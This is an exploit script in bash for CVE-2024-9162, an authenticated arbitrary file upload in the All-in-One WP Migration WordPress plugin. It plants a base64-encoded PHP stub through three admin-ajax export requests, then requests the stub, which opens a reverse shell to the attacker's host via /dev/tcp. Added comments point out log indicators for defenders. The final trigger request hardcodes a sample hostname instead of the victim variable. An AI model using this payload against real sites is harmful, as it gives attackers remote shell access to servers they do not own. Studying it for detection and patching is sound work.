# Exploit Title: All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary File Upload
# Date: 09/29/2024
# Exploit Author: Ryan Kozak https://ryankozak.com
# Vendor Homepage: https://servmask.com/
# Version: <= 7.86
# Tested on: 7.86
# CVE : CVE-2024-9162
#!/bin/bash
# Print the expected command-line form (victim URL, secret key, listener IP, listener port) to stdout.
show_usage () {
  printf '%s\n' "Example Usage: "
  printf '%s\n' " ./CVE-2024-9162.sh https://wordpress.hacker PwrqqK3UHQJo 192.168.100.86 4444"
}
# Names of the file and directory that the trigger request at the end of this script
# expects under wp-content/plugins/all-in-one-wp-migration/storage/. A .php file appearing
# in that storage directory is the on-disk artifact a defender can look for; both values are
# attacker-chosen, so detection should not key on these specific names.
XFILE_NAME=CVE-2024-9162.php # Change if you'd like.
XDIRECTORY_NAME=CVE-2024-9162 # Change if you'd like.
# Validate required arguments: victim URL, plugin secret key, attacker IP and listening port.
# SECRET_KEY is sent in every POST body below as secret_key=, i.e. the requests are
# authenticated — consistent with the "Authenticated (Administrator+)" scope in the header.
if [ "$#" -eq 4 ]; then
VICTIM_URL=$1
SECRET_KEY=$2
# NOTE: the payload below reads $3/$4 directly rather than these two variables.
ATTACKER_IP=$3
ATTACKER_PORT=$4
else
show_usage
exit 1
fi
# Exploit Payload: a PHP stub that base64-decodes and eval()s a shell_exec() call
# (bash /dev/tcp back to $3:$4). Built in three steps: raw PHP -> base64 -> eval wrapper.
PAYLOAD="shell_exec('bash -c \"/bin/bash -i >& /dev/tcp/$3/$4 0>&1 \" 2>/dev/null');"
# $PAYLOAD is unquoted here, so bash word-splits it and echo rejoins the words with single
# spaces; for the value above that is a no-op. Note that GNU base64 wraps its output at 76
# columns, so PAYLOAD may contain an embedded newline after this step — presumably tolerated
# by PHP's non-strict base64_decode(), which skips whitespace (unverified here).
PAYLOAD=$(echo -n $PAYLOAD | base64)
PAYLOAD="<?php eval(base64_decode('$PAYLOAD')); ?>"
# URL-encode the payload before it's sent. Two shell quirks on this line: $PAYLOAD is unquoted,
# so "<?php" is subject to pathname expansion (the '?' is a glob) and only survives because
# nothing in the cwd matches; and echo's trailing newline is kept by --slurp, so the encoded
# value ends in %0A.
PAYLOAD=$(echo $PAYLOAD | jq --slurp --raw-input --raw-output @uri)
# Three otherwise-identical export requests that differ only in priority (30, 50, 60).
# Request-level indicators visible in each: POST to /wp-admin/admin-ajax.php with
# action=ai1wm_export&ai1wm_import=1 in the query string, a storage= / archive= pair that
# names a .php file, and a replace new_value[] carrying the URL-encoded "<?php" stub.
# Quoting note: $"..." is bash locale-translation quoting and otherwise behaves like a plain
# double-quoted string, so the leading \x0d\x0a sequences are NOT interpreted (as they would
# be in $'...') and are sent as literal backslash text prefixed to the first form field.
# Presumably the action/ai1wm_import repeated in the query string is what keeps the request
# routed despite that — unverified here. -s duplicates --silent, and -i (include response
# headers) has no visible effect with --output /dev/null; -k disables TLS verification.
PRIORITY_INT=30
curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \
--data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \
$"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"
# Second pass, same body with priority=50.
PRIORITY_INT=50
curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \
--data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \
$"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"
# Third pass, same body with priority=60.
PRIORITY_INT=60
curl --silent --output /dev/null --path-as-is -i -s -k -X $'POST' \
--data-binary $"\x0d\x0a\x0d\x0a\x0d\x0aaction=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bold_value%5D%5B%5D=&options%5Breplace%5D%5Bold_value%5D%5B%5D=*&options%5Breplace%5D%5Bnew_value%5D%5B%5D=&options%5Breplace%5D%5Bnew_value%5D%5B%5D=$PAYLOAD&options%5Bencrypt_password%5D=&options%5Bencrypt_password_confirmation%5D=&options%5Bno_spam_comments%5D=on&options%5Bno_post_revisions%5D=on&options%5Bno_media%5D=on&options%5Bno_themes%5D=on&options%5Bno_muplugins%5D=on&options%5Bno_plugins%5D=on&options%5Bno_database%5D=on&options%5Bno_email_replace%5D=on&ai1wm_manual_export=1&storage=$XDIRECTORY_NAME&file=1&secret_key=$SECRET_KEY&priority=$PRIORITY_INT&archive=$XFILE_NAME" \
$"$VICTIM_URL/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1"
# TRIGGER THE EXPLOIT CODE: request the dropped .php file so the web server runs it.
# The request path, wp-content/plugins/all-in-one-wp-migration/storage/<dir>/<file>.php,
# is the access-log indicator for this technique (directory and file names are attacker-chosen).
echo "Triggering exploit, check your listener..."
# --max-time 0 disables curl's overall timeout, so this call blocks for as long as the
# server-side request stays open; -k disables TLS verification.
curl -k --max-time 0 https://wordpress.hacker/wp-content/plugins/all-in-one-wp-migration/storage/$XDIRECTORY_NAME/$XFILE_NAME